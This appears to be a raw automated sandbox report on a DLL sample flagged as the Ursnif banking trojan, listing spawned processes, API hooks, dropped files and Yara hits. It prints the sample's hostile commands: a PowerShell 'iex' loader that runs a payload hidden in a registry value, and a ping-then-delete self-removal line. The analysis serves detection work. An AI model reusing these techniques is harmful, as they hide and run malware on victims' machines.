Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211008

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@54/38@14/8

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00B04A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00B04A03

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9C6EB822-4BB9-2E3E-B590-AF42B9C45396}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6032BFB6-3FC2-92EA-C994-E3E60D08C77A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uT9rwkGATJ.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: uT9rwkGATJ.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: uT9rwkGATJ.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source:	Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp

Source: uT9rwkGATJ.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uT9rwkGATJ.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uT9rwkGATJ.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uT9rwkGATJ.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uT9rwkGATJ.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A21A3 push ecx; ret	0_2_6E1A21B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A2150 push ecx; ret	0_2_6E1A2159
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B0ABE0 push ecx; ret	0_2_00B0ABE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B0AF13 push ecx; ret	0_2_00B0AF23
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00670B91 push edi; retf	0_2_00670B96
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B56106 push ecx; mov dword ptr [esp], 00000002h	0_2_00B56107
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B7A283 push ecx; ret	0_2_00B7A293
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00570B91 push edi; retf	2_2_00570B96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02DA0B91 push edi; retf	3_2_02DA0B96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0336A283 push ecx; ret	3_2_0336A293
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03346106 push ecx; mov dword ptr [esp], 00000002h	3_2_03346107
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BDABE0 push ecx; ret	4_2_02BDABE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BDAF13 push ecx; ret	4_2_02BDAF23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00840B91 push edi; retf	4_2_00840B96

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,

0_2_6E1A1DE5

Source: hiiw3gsl.dll.31.dr	Static PE information: real checksum: 0x0 should be: 0x20ab
Source: uio4qdnj.dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x7dd1
Source: uT9rwkGATJ.dll	Static PE information: real checksum: 0xa274a should be: 0xa6bea
Source: ebytp2em.dll.35.dr	Static PE information: real checksum: 0x0 should be: 0x85fb
Source: hjljqxud.dll.32.dr	Static PE information: real checksum: 0x0 should be: 0xb2f3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ebytp2em.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hjljqxud.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Self deletion via cmd delete

Show sources

Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
